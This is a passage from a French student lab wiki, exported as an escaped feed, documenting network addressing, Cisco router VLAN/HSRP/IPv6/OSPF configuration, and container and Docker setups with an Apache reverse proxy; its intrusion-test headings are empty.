La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
router ospf 1&lt;br /&gt;
 router-id 10.60.11.252&lt;br /&gt;
 log-adjacency-changes&lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
 redistribute connected subnets&lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49097</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49097"/>
				<updated>2018-12-21T15:27:30Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.5 Interconnexion avec Internet IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
